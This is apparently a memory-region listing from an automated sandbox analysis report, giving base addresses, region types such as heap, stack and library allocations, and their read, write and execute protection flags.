page read and write
1CD6000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
200F000
stack
page read and write
1B0FE000
stack
page read and write
7FE898A2000
trusted library allocation
page read and write
2F28000
trusted library allocation
page read and write
209F000
stack
page read and write
12D000
heap
page read and write
4D95000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
39A4000
heap
page read and write
537000
heap
page read and write
27FF000
trusted library allocation
page read and write
4EC000
heap
page read and write
2BD000
heap
page read and write
22C4000
trusted library allocation
page read and write
4B0000
heap
page read and write
5F6000
heap
page read and write
1F0000
heap
page read and write
523C000
heap
page read and write
7FE89AA8000
trusted library allocation
page read and write
95FF000
trusted library allocation
page read and write
4D9E000
stack
page read and write
2622000
trusted library allocation
page read and write
122C1000
trusted library allocation
page read and write
5F6000
heap
page read and write
40C000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
54A0000
trusted library allocation
page read and write
4E0E000
heap
page read and write
544D000
heap
page read and write
5559000
heap
page read and write
1C1A8000
stack
page read and write
52E0000
heap
page read and write
7FE89B1C000
trusted library allocation
page read and write
2E0B000
trusted library allocation
page read and write
2C50000
heap
page read and write
464000
heap
page read and write
3E95000
heap
page read and write
2F25000
trusted library allocation
page read and write
4D94000
heap
page read and write
4FD6000
heap
page read and write
1B3D5000
heap
page read and write
399B000
heap
page read and write
20E9000
heap
page read and write
1A64F000
stack
page read and write
598000
heap
page read and write
276D000
trusted library allocation
page read and write
3954000
heap
page read and write
3FF000
heap
page read and write
3BFF000
trusted library allocation
page read and write
4E0F000
heap
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1DA0000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
22D7000
trusted library allocation
page read and write
386000
heap
page read and write
1C249000
heap
page read and write
475000
heap
page read and write
48E000
heap
page read and write
54B000
heap
page read and write
1B0000
trusted library allocation
page read and write
3F62000
heap
page read and write
47A000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
258000
heap
page read and write
4E9E000
heap
page read and write
31FF000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
3F10000
heap
page read and write
476000
heap
page read and write
52DA000
heap
page read and write
1E20000
direct allocation
page read and write
4EEC000
heap
page read and write
2E01000
trusted library allocation
page read and write
1F0E000
heap
page execute and read and write
2F35000
trusted library allocation
page read and write
522B000
heap
page read and write
180000
heap
page read and write
5062000
heap
page read and write
3F0A000
heap
page read and write
3B8000
heap
page read and write
470000
heap
page read and write
3997000
heap
page read and write
1EC0000
heap
page read and write
26FF000
trusted library allocation
page read and write
150000
heap
page read and write
4A7000
direct allocation
page read and write
4AB000
heap
page read and write
1C93A000
stack
page read and write
3F7D000
heap
page read and write
50D2000
heap
page read and write
508000
heap
page read and write
3F0E000
heap
page read and write
1C24B000
heap
page read and write
50E2000
heap
page read and write
1B04F000
stack
page read and write
4BD000
direct allocation
page read and write
21DE000
stack
page read and write
10000
heap
page read and write
1B1CE000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
522000
heap
page read and write
1B4B0000
heap
page read and write
1E00000
direct allocation
page read and write
43EF000
stack
page read and write
4FF7000
heap
page read and write
20000
heap
page read and write
3F7B000
heap
page read and write
320000
trusted library allocation
page read and write
4AB000
heap
page read and write
589000
heap
page read and write
2355000
trusted library allocation
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
4AB000
heap
page read and write
173000
heap
page read and write
10000
heap
page read and write
4AF000
heap
page read and write
3950000
heap
page read and write
1AB14000
heap
page read and write
4D95000
heap
page read and write
4FE6000
heap
page read and write
55A000
heap
page read and write
191000
heap
page read and write
5042000
heap
page read and write
3FC0000
heap
page read and write
7FE89A42000
trusted library allocation
page read and write
149000
heap
page read and write
12290000
trusted library allocation
page read and write
5ED000
heap
page read and write
4E0000
heap
page read and write
145000
heap
page read and write
4CE1000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
9FFF000
trusted library allocation
page read and write
5A5000
heap
page read and write
1F0000
trusted library allocation
page read and write
21B000
stack
page read and write
4A0000
direct allocation
page read and write
52E7000
heap
page read and write
119000
heap
page read and write
572000
heap
page read and write
1C293000
heap
page read and write
1AB0F000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
5231000
heap
page read and write
3F12000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
2E0D000
trusted library allocation
page read and write
236E000
trusted library allocation
page read and write
121000
heap
page read and write
1AC19000
stack
page read and write
2E6000
heap
page read and write
3E80000
heap
page read and write
4CA0000
heap
page read and write
2E4000
heap
page read and write
37F6000
heap
page read and write
10000
heap
page read and write
4EE000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
3C0000
heap
page read and write
330000
heap
page read and write
45D000
heap
page read and write
4FB000
heap
page read and write
1B43C000
stack
page read and write
23E4000
trusted library allocation
page read and write
3F7D000
heap
page read and write
1C3000
trusted library allocation
page execute and read and write
3F18000
heap
page read and write
500000
heap
page read and write
D9000
heap
page read and write
380000
heap
page read and write
3970000
trusted library allocation
page read and write
3F15000
heap
page read and write
16E000
heap
page read and write
49AF000
stack
page read and write
5AFE000
stack
page read and write
2321000
trusted library allocation
page read and write
191000
heap
page read and write
835000
heap
page read and write
4C0000
direct allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
4DE000
stack
page read and write
302000
heap
page read and write
23D0000
trusted library allocation
page read and write
23FE000
trusted library allocation
page read and write
152000
heap
page read and write
2290000
heap
page execute and read and write
7FE89AB0000
trusted library allocation
page read and write
1AA38000
stack
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
150000
trusted library allocation
page read and write
7FE898BB000
trusted library allocation
page read and write
4D7E000
heap
page read and write
50DE000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
1C26E000
heap
page read and write
18E000
heap
page read and write
BA0000
heap
page execute and read and write
475000
heap
page read and write
3997000
heap
page read and write
144000
heap
page read and write
1C63C000
stack
page read and write
3F1A000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
229000
heap
page read and write
50A000
heap
page read and write
1C6DE000
stack
page read and write
523E000
stack
page read and write
310000
trusted library allocation
page read and write
40CB000
stack
page read and write
360000
heap
page read and write
1B040000
heap
page read and write
1DDB000
heap
page read and write
3F14000
heap
page read and write
3063000
trusted library allocation
page read and write
1C76E000
stack
page read and write
10000
heap
page read and write
2D0000
trusted library allocation
page execute and read and write
396000
heap
page read and write
149000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
3D20000
trusted library allocation
page read and write
1AA8A000
heap
page read and write
21F4000
heap
page read and write
4E8000
heap
page read and write
594000
heap
page read and write
4F1F000
heap
page read and write
470D000
stack
page read and write
52E5000
heap
page read and write
241E000
stack
page read and write | page guard
3961000
heap
page read and write
1C94000
heap
page read and write
4171000
trusted library allocation
page read and write
5081000
heap
page read and write
52CD000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
1C12000
trusted library allocation
page read and write
2E05000
trusted library allocation
page read and write
2300000
heap
page execute and read and write
125000
heap
page read and write
7FE89950000
trusted library allocation
page read and write
1F60000
heap
page execute and read and write
7FE89AF0000
trusted library allocation
page read and write
4EA1000
heap
page read and write
4F4C000
stack
page read and write
2F3F000
trusted library allocation
page read and write
5430000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
5DD000
heap
page read and write
26A0000
trusted library allocation
page read and write
5FB000
heap
page read and write
4FF000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
452000
heap
page read and write
3EA2000
heap
page read and write
350000
heap
page read and write
1C10000
trusted library allocation
page read and write
292000
stack
page read and write
5D2000
heap
page read and write
52EA000
heap
page read and write
522B000
heap
page read and write
52DA000
heap
page read and write
3F80000
trusted library allocation
page read and write
4E0E000
heap
page read and write
7E0000
heap
page read and write
3B6000
heap
page read and write
4D3A000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
2372000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
399B000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
1DD000
trusted library allocation
page execute and read and write
4AF000
heap
page read and write
5FB000
heap
page read and write
122000
stack
page read and write
3760000
heap
page read and write
23D8000
trusted library allocation
page read and write
4CE0000
heap
page read and write
23B6000
trusted library allocation
page read and write
4DA0000
heap
page read and write
52DA000
heap
page read and write
3960000
heap
page read and write
7FE89950000
trusted library allocation
page read and write
3E7F000
stack
page read and write
3F7B000
heap
page read and write
1ED0000
heap
page execute and read and write
7FE898A4000
trusted library allocation
page read and write
5231000
heap
page read and write
5DF000
heap
page read and write
556000
heap
page read and write
52A000
heap
page read and write
475000
heap
page read and write
577000
heap
page read and write
3EE6000
heap
page read and write
152000
heap
page read and write
188000
stack
page read and write
4BF000
direct allocation
page read and write
4E6000
heap
page read and write
50A000
heap
page read and write
2AB000
trusted library allocation
page execute and read and write
2690000
trusted library allocation
page read and write
418000
heap
page read and write
1E27000
direct allocation
page read and write
7FE89A82000
trusted library allocation
page read and write
4D8F000
heap
page read and write
3F6000
heap
page read and write
23FC000
trusted library allocation
page read and write
3EA2000
heap
page read and write
4FA7000
heap
page read and write
4AF000
heap
page read and write
3F0A000
heap
page read and write
29A0000
trusted library allocation
page execute read
5F3000
heap
page read and write
3F73000
heap
page read and write
1FC0000
heap
page read and write
50E000
heap
page read and write
4AF000
heap
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1B03E000
stack
page read and write
1A939000
stack
page read and write
2E07000
trusted library allocation
page read and write
8F0000
heap
page read and write
4BB000
direct allocation
page read and write
39A0000
heap
page read and write
3B30000
trusted library allocation
page read and write
5234000
heap
page read and write
54A0000
trusted library allocation
page read and write
3EE000
heap
page read and write
1DE0000
direct allocation
page read and write
50E7000
heap
page read and write
12281000
trusted library allocation
page read and write
8BFF000
trusted library allocation
page read and write
250000
heap
page read and write
1B7DB000
heap
page read and write
4F25000
heap
page read and write
52E0000
heap
page read and write
22B1000
trusted library allocation
page read and write
7FE89986000
trusted library allocation
page execute and read and write
4F1F000
heap
page read and write
513000
heap
page read and write
57D000
stack
page read and write
3FA000
heap
page read and write
305000
heap
page read and write
530B000
heap
page read and write
3C9000
heap
page read and write
1AACC000
heap
page read and write
2200000
heap
page read and write
3CA0000
trusted library allocation
page read and write
4D91000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
1CB0000
heap
page execute and read and write
23BC000
trusted library allocation
page read and write
17F000
heap
page read and write
4A3000
direct allocation
page read and write
39A5000
heap
page read and write
573000
heap
page read and write
30D000
heap
page read and write
484E000
stack
page read and write
220000
heap
page read and write
241F000
stack
page read and write
29A000
trusted library allocation
page execute and read and write
305F000
stack
page read and write
4F8000
heap
page read and write
4960000
heap
page read and write
2156000
heap
page read and write
48E000
heap
page read and write
520A000
heap
page read and write
417D000
trusted library allocation
page read and write
3CA0000
trusted library allocation
page read and write
4F27000
heap
page read and write
50A000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE898BB000
trusted library allocation
page read and write
3B2E000
stack
page read and write
4F09000
heap
page read and write
530C000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
51B000
heap
page read and write
1C28D000
heap
page read and write
219E000
heap
page read and write
1AAA6000
heap
page read and write
1F40000
heap
page read and write
1BA0000
heap
page read and write
1C277000
heap
page read and write
1B3D0000
heap
page read and write
17D000
heap
page read and write
2A7000
trusted library allocation
page execute and read and write
3460000
trusted library allocation
page read and write
8B5000
heap
page read and write
318A000
stack
page read and write
480000
heap
page read and write
1A808000
stack
page read and write
3F06000
heap
page read and write
4180000
trusted library allocation
page read and write
2163000
heap
page read and write
4AB000
heap
page read and write
3F1A000
heap
page read and write
40C000
heap
page read and write
3EFB000
heap
page read and write
47C0000
heap
page execute and read and write
122E1000
trusted library allocation
page read and write
3B0000
heap
page read and write
1AAF1000
heap
page read and write
50EE000
stack
page read and write
400000
remote allocation
page execute and read and write
50E2000
heap
page read and write
1A474000
heap
page execute and read and write
37C0000
heap
page read and write
512C000
heap
page read and write
52E7000
heap
page read and write
366C000
stack
page read and write
1FD000
heap
page read and write
3FF000
heap
page read and write
467F000
stack
page read and write
4F25000
heap
page read and write
3B0000
heap
page read and write
408000
heap
page read and write
4D91000
heap
page read and write
3F2E000
stack
page read and write
3CA0000
trusted library allocation
page read and write
433000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
4AF000
heap
page read and write
106000
heap
page read and write
50A1000
heap
page read and write
10000
heap
page read and write
1A0000
trusted library allocation
page read and write
2281000
trusted library allocation
page read and write
56C000
heap
page read and write
1FF000
trusted library allocation
page read and write
122B7000
trusted library allocation
page read and write
53A000
heap
page read and write
1C800000
heap
page read and write
1D0000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
477000
heap
page read and write
1DA0000
direct allocation
page read and write
48E000
heap
page read and write
3F7B000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
292000
trusted library allocation
page read and write
4D91000
heap
page read and write
460000
heap
page read and write
3F0A000
heap
page read and write
D0000
heap
page read and write
4FFF000
trusted library allocation
page read and write
1DC0000
direct allocation
page read and write
1B6BE000
stack
page read and write
460000
direct allocation
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
4D95000
heap
page read and write
5B0000
heap
page execute and read and write
4F27000
heap
page read and write
19C000
stack
page read and write
530000
trusted library allocation
page execute and read and write
13B000
heap
page read and write
1B7A0000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
570000
heap
page read and write
3F14000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
7FE89AA8000
trusted library allocation
page read and write
4D7E000
heap
page read and write
1AB09000
heap
page read and write
54A0000
trusted library allocation
page read and write
296000
trusted library allocation
page execute and read and write
14A000
heap
page read and write
5080000
heap
page read and write
48E000
heap
page read and write
2481000
trusted library allocation
page read and write
3F6C000
heap
page read and write
3B9000
heap
page read and write
52D7000
heap
page read and write
527000
heap
page read and write
1A5DE000
stack
page read and write
1E50000
heap
page read and write
1B37C000
stack
page read and write
85F000
heap
page read and write
1C0000
trusted library allocation
page read and write
20000
heap
page read and write
3321000
trusted library allocation
page read and write
852000
heap
page read and write
535000
heap
page read and write
4F25000
heap
page read and write
1A2FC000
stack
page read and write
1E33000
direct allocation
page read and write
45FF000
trusted library allocation
page read and write
3B70000
heap
page read and write
215000
stack
page read and write
1AAB1000
heap
page read and write
1E8F000
stack
page read and write
4EA000
heap
page read and write
1C14E000
stack
page read and write
374000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
1BD6000
heap
page read and write
2188000
heap
page read and write
1C4000
trusted library allocation
page read and write
4165000
trusted library allocation
page read and write
414000
heap
page read and write
2E12000
trusted library allocation
page read and write
7FE89AA4000
trusted library allocation
page read and write
1A6EF000
stack
page read and write
1FF000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
3D1C000
stack
page read and write
358000
stack
page read and write
4AB000
heap
page read and write
1AABA000
heap
page read and write
27A2000
trusted library allocation
page read and write
63FF000
trusted library allocation
page read and write
487000
heap
page read and write
52E0000
heap
page read and write
152000
heap
page read and write
1C16000
heap
page read and write
817000
heap
page read and write
1B7A5000
heap
page read and write
556000
heap
page read and write
1D60000
heap
page read and write
173000
heap
page read and write
1CA0000
heap
page read and write
27AC000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
4D8F000
heap
page read and write
2122000
heap
page read and write
14F000
heap
page read and write
1C22C000
stack
page read and write
3EE6000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
2C40000
remote allocation
page read and write
2E0000
heap
page read and write
5AC000
heap
page read and write
592E000
stack
page read and write
556000
heap
page read and write
558000
heap
page read and write
1E2000
stack
page read and write
2F4000
heap
page read and write
3E95000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
7FE898A4000
trusted library allocation
page read and write
5DC1000
heap
page read and write
3F64000
heap
page read and write
232C000
trusted library allocation
page read and write
4E9B000
heap
page read and write
4F25000
heap
page read and write
59FF000
trusted library allocation
page read and write
530B000
heap
page read and write
7E4000
heap
page read and write
3F7D000
heap
page read and write
516000
heap
page read and write
4D99000
heap
page read and write
1AB0B000
heap
page read and write
4F1000
heap
page read and write
48E000
heap
page read and write
52E7000
heap
page read and write
1D0000
trusted library allocation
page read and write
85D000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
3F6C000
heap
page read and write
42BF000
stack
page read and write
3F19000
heap
page read and write
20A0000
heap
page read and write
122000
heap
page read and write
1D67000
heap
page read and write
7B0000
direct allocation
page read and write
4AE000
heap
page read and write
3F14000
heap
page read and write
1C90000
heap
page read and write
293000
heap
page read and write
4EA0000
heap
page read and write
52D5000
heap
page read and write
4FED000
heap
page read and write
130000
trusted library allocation
page read and write
26C5000
trusted library allocation
page read and write
50B000
heap
page read and write
5C5E000
stack
page read and write
5DA0000
heap
page read and write
28E000
heap
page read and write
3EFA000
heap
page read and write
177000
heap
page read and write
4FB0000
heap
page read and write
182000
heap
page read and write
20000
heap
page read and write
5CE0000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
18E000
heap
page read and write
57CE000
stack
page read and write
276A000
trusted library allocation
page read and write
3F1E000
heap
page read and write
5DB0000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
5555000
heap
page read and write
1B35F000
stack
page read and write
2F0000
heap
page read and write
3F6C000
heap
page read and write
142000
heap
page read and write
1AAAF000
heap
page read and write
39CE000
heap
page read and write
1D64000
heap
page read and write
500000
heap
page read and write
508000
heap
page read and write
130000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
3F6A000
heap
page read and write
3E0000
trusted library allocation
page read and write
37BF000
stack
page read and write
3F74000
heap
page read and write
7FE89986000
trusted library allocation
page execute and read and write
3C0000
heap
page read and write
340C000
trusted library allocation
page read and write
790000
direct allocation
page read and write
3F71000
heap
page read and write
3F7B000
heap
page read and write
C0000
trusted library allocation
page read and write
2E03000
trusted library allocation
page read and write
4CB5000
heap
page read and write
27FB000
trusted library allocation
page read and write
7FE89A5C000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
2A30000
heap
page read and write
481000
heap
page read and write
3F0F000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
2E09000
trusted library allocation
page read and write
479000
heap
page read and write
27EE000
trusted library allocation
page read and write
39C8000
heap
page read and write
1C230000
heap
page read and write
56D000
heap
page read and write
1B4D0000
heap
page read and write
526E000
heap
page read and write
1AEEE000
stack
page read and write
23E6000
trusted library allocation
page read and write
4F25000
heap
page read and write
5043000
heap
page read and write
1FF000
trusted library allocation
page read and write
7FE898B0000
trusted library allocation
page read and write
810000
heap
page read and write
3349000
trusted library allocation
page read and write
21B000
stack
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89956000
trusted library allocation
page read and write
3FF000
heap
page read and write
173000
heap
page read and write
1C7FF000
stack
page read and write
81FF000
trusted library allocation
page read and write
1E54000
heap
page read and write
1A470000
heap
page execute and read and write
1F4000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
439000
heap
page read and write
530A000
heap
page read and write
513000
heap
page read and write
3F73000
heap
page read and write
144000
heap
page read and write
39C8000
heap
page read and write
2130000
heap
page read and write
2C55000
heap
page read and write
3490000
trusted library allocation
page execute
3920000
trusted library allocation
page read and write
47B000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
5980000
heap
page read and write
1C18E000
stack
page read and write
4F26000
heap
page read and write
10000
heap
page read and write
10000
heap
page read and write
5234000
heap
page read and write
20B0000
heap
page read and write
48A000
heap
page read and write
20000
heap
page read and write
370000
heap
page read and write
3B4000
heap
page read and write
3F7D000
heap
page read and write
174000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
173000
heap
page read and write
219B000
heap
page read and write
153000
heap
page read and write
479000
heap
page read and write
50E2000
heap
page read and write
5550000
heap
page read and write
1C26E000
stack
page read and write
50A000
heap
page read and write
52D7000
heap
page read and write
1B0000
heap
page read and write
36F0000
trusted library allocation
page read and write
D0000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
22F000
heap
page read and write
39C8000
heap
page read and write
4FEC000
heap
page read and write
2A2000
trusted library allocation
page read and write
10000
heap
page read and write
50AA000
heap
page read and write
2421000
trusted library allocation
page read and write
20A3000
heap
page read and write
231F000
stack
page read and write
25F000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
1C2A6000
heap
page read and write
3F73000
heap
page read and write
50A0000
heap
page read and write
4178000
trusted library allocation
page read and write
1ED8000
heap
page execute and read and write
1C520000
heap
page read and write
1BE0000
trusted library allocation
page read and write
479000
heap
page read and write
2360000
trusted library allocation
page read and write
A0000
trusted library section
page read and write
598000
heap
page read and write
21F0000
heap
page read and write
5173000
heap
page read and write
2167000
heap
page read and write
3F71000
heap
page read and write
23E8000
trusted library allocation
page read and write
6DFF000
trusted library allocation
page read and write
537E000
stack
page read and write
7FE89A40000
trusted library allocation
page read and write
21BF000
stack
page read and write
556000
heap
page read and write
1B40B000
heap
page read and write
48E000
heap
page read and write
4F22000
heap
page read and write
3500000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
1AF8F000
stack
page read and write
50B1000
heap
page read and write
2C40000
remote allocation
page read and write
4E0E000
heap
page read and write
27E3000
trusted library allocation
page read and write
210000
heap
page execute and read and write
185000
heap
page read and write
53A000
heap
page read and write
27F4000
trusted library allocation
page read and write
1B7000
heap
page read and write
30A000
heap
page read and write
4D95000
heap
page read and write
4FFB000
heap
page read and write
1DA0000
heap
page read and write
77FF000
trusted library allocation
page read and write
1AA7E000
heap
page read and write
475E000
stack
page read and write
39B0000
heap
page read and write
4AF000
heap
page read and write
2837000
trusted library allocation
page read and write
1D5000
heap
page read and write
2A0000
heap
page read and write
503F000
heap
page read and write
313000
trusted library allocation
page read and write
3670000
trusted library allocation
page read and write
556000
heap
page read and write
2A0C000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
39A5000
heap
page read and write
2B0000
heap
page read and write
4FA7000
heap
page read and write
520000
trusted library allocation
page read and write
5308000
heap
page read and write
2C8B000
heap
page read and write
5B4E000
stack
page read and write
3F6C000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
4DA000
heap
page read and write
2F3000
stack
page read and write
2A4000
heap
page read and write
4FDF000
heap
page read and write
3F1F000
heap
page read and write
30F000
heap
page read and write
4E8000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
122B1000
trusted library allocation
page read and write
418000
heap
page read and write
2F1E000
stack
page read and write
1FF6000
heap
page read and write
431000
heap
page read and write
40C000
heap
page read and write
439000
heap
page read and write
4E0E000
heap
page read and write
152000
heap
page read and write
5E7000
heap
page read and write
5080000
heap
page read and write
There are 828 hidden memdumps, click here to show them.